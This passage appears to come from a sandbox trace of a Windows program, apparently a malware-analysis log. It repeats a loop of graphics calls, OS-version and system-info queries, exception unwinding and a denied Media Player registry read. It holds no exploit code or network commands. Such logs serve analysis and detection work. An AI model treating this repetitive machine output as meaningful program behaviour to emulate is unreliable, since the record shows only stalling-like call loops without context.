color=0x0) returned 0xffffffff [0092.352] BeginPath (hdc=0x0) returned 0 [0092.352] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.352] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.352] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.352] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.352] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.352] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.353] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.353] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.353] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401d9 [0092.353] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401dc [0092.353] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f6 [0092.353] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f7 [0092.353] CombineRgn (hrgnDst=0x10477f6, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=1) returned 1 [0092.353] CombineRgn (hrgnDst=0x10477f7, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=4) returned 2 [0092.353] CreateSolidBrush (color=0xff) returned 0x21077f5 [0092.353] CreateSolidBrush (color=0xff0000) returned 0x11077f8 [0092.353] DeleteObject (ho=0x11077f8) returned 1 [0092.353] DeleteObject (ho=0xae0401dc) returned 1 [0092.353] DeleteObject (ho=0xb00401d9) returned 1 [0092.353] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.353] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.353] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.353] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.353] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.353] BeginPath (hdc=0x0) returned 0 [0092.353] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.353] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.353] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.353] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.353] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.353] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.353] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.353] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.353] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401dc [0092.353] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401d9 [0092.353] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477f9 [0092.354] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477fa [0092.354] CombineRgn (hrgnDst=0x10477f9, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=1) returned 1 [0092.354] CombineRgn (hrgnDst=0x10477fa, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=4) returned 2 [0092.354] CreateSolidBrush (color=0xff) returned 0x21077f8 [0092.354] CreateSolidBrush (color=0xff0000) returned 0x11077fb [0092.354] DeleteObject (ho=0x11077fb) returned 1 [0092.354] DeleteObject (ho=0xb10401d9) returned 1 [0092.354] DeleteObject (ho=0xaf0401dc) returned 1 [0092.354] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.354] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.354] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.354] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.354] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.354] BeginPath (hdc=0x0) returned 0 [0092.354] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.354] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.354] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.354] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.354] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.354] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.354] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.354] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401d9 [0092.354] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401dc [0092.354] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477fc [0092.354] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477fd [0092.354] CombineRgn (hrgnDst=0x10477fc, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=1) returned 1 [0092.354] CombineRgn (hrgnDst=0x10477fd, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=4) returned 2 [0092.354] CreateSolidBrush (color=0xff) returned 0x21077fb [0092.354] CreateSolidBrush (color=0xff0000) returned 0x11077fe [0092.354] DeleteObject (ho=0x11077fe) returned 1 [0092.354] DeleteObject (ho=0xb00401dc) returned 1 [0092.354] DeleteObject (ho=0xb20401d9) returned 1 [0092.354] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.354] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.354] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.354] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.355] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.355] BeginPath (hdc=0x0) returned 0 [0092.355] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.355] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.355] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.355] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.355] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.355] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.355] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.355] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.355] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401dc [0092.355] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401d9 [0092.355] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477ff [0092.355] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047800 [0092.355] CombineRgn (hrgnDst=0x10477ff, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=1) returned 1 [0092.355] CombineRgn (hrgnDst=0x1047800, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=4) returned 2 [0092.355] CreateSolidBrush (color=0xff) returned 0x21077fe [0092.355] CreateSolidBrush (color=0xff0000) returned 0x1107801 [0092.355] DeleteObject (ho=0x1107801) returned 1 [0092.355] DeleteObject (ho=0xb30401d9) returned 1 [0092.355] DeleteObject (ho=0xb10401dc) returned 1 [0092.355] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.355] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.355] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.355] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.355] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.355] BeginPath (hdc=0x0) returned 0 [0092.355] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.355] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.355] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.355] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.355] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.355] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.356] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.356] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.356] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401d9 [0092.356] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401dc [0092.356] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047802 [0092.356] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047803 [0092.356] CombineRgn (hrgnDst=0x1047802, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=1) returned 1 [0092.356] CombineRgn (hrgnDst=0x1047803, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=4) returned 2 [0092.356] CreateSolidBrush (color=0xff) returned 0x2107801 [0092.356] CreateSolidBrush (color=0xff0000) returned 0x1107804 [0092.356] DeleteObject (ho=0x1107804) returned 1 [0092.356] DeleteObject (ho=0xb20401dc) returned 1 [0092.356] DeleteObject (ho=0xb40401d9) returned 1 [0092.356] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.356] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.356] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.356] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.356] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.356] BeginPath (hdc=0x0) returned 0 [0092.356] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.356] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.356] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.356] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.356] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.356] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.356] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.356] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.356] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401dc [0092.356] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401d9 [0092.356] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047805 [0092.356] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047806 [0092.356] CombineRgn (hrgnDst=0x1047805, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=1) returned 1 [0092.356] CombineRgn (hrgnDst=0x1047806, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=4) returned 2 [0092.356] CreateSolidBrush (color=0xff) returned 0x2107804 [0092.357] CreateSolidBrush (color=0xff0000) returned 0x1107807 [0092.357] DeleteObject (ho=0x1107807) returned 1 [0092.357] DeleteObject (ho=0xb50401d9) returned 1 [0092.357] DeleteObject (ho=0xb30401dc) returned 1 [0092.357] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.357] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.357] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.357] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.357] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.357] BeginPath (hdc=0x0) returned 0 [0092.357] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.357] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.357] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.357] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.357] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.357] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.357] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.357] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.357] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401d9 [0092.357] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401dc [0092.357] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047808 [0092.357] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047809 [0092.357] CombineRgn (hrgnDst=0x1047808, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=1) returned 1 [0092.357] CombineRgn (hrgnDst=0x1047809, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=4) returned 2 [0092.357] CreateSolidBrush (color=0xff) returned 0x2107807 [0092.357] CreateSolidBrush (color=0xff0000) returned 0x110780a [0092.357] DeleteObject (ho=0x110780a) returned 1 [0092.357] DeleteObject (ho=0xb40401dc) returned 1 [0092.357] DeleteObject (ho=0xb60401d9) returned 1 [0092.357] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.357] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.357] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.357] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.357] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.357] BeginPath (hdc=0x0) returned 0 [0092.357] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.357] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.357] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.357] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.357] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.358] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.358] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.358] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.358] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401dc [0092.358] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401d9 [0092.358] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104780b [0092.358] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104780c [0092.358] CombineRgn (hrgnDst=0x104780b, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=1) returned 1 [0092.358] CombineRgn (hrgnDst=0x104780c, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=4) returned 2 [0092.358] CreateSolidBrush (color=0xff) returned 0x210780a [0092.358] CreateSolidBrush (color=0xff0000) returned 0x110780d [0092.358] DeleteObject (ho=0x110780d) returned 1 [0092.358] DeleteObject (ho=0xb70401d9) returned 1 [0092.358] DeleteObject (ho=0xb50401dc) returned 1 [0092.358] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.358] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.358] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.358] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.358] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.358] BeginPath (hdc=0x0) returned 0 [0092.358] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.358] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.358] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.358] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.358] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.358] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.358] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.359] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401d9 [0092.359] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401dc [0092.359] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104780e [0092.359] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104780f [0092.359] CombineRgn (hrgnDst=0x104780e, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=1) returned 1 [0092.359] CombineRgn (hrgnDst=0x104780f, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=4) returned 2 [0092.359] CreateSolidBrush (color=0xff) returned 0x210780d [0092.359] CreateSolidBrush (color=0xff0000) returned 0x1107810 [0092.359] DeleteObject (ho=0x1107810) returned 1 [0092.359] DeleteObject (ho=0xb60401dc) returned 1 [0092.359] DeleteObject (ho=0xb80401d9) returned 1 [0092.359] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.359] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.359] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.359] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.359] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.359] BeginPath (hdc=0x0) returned 0 [0092.359] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.359] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.359] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.359] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.359] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.359] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.359] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.359] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401dc 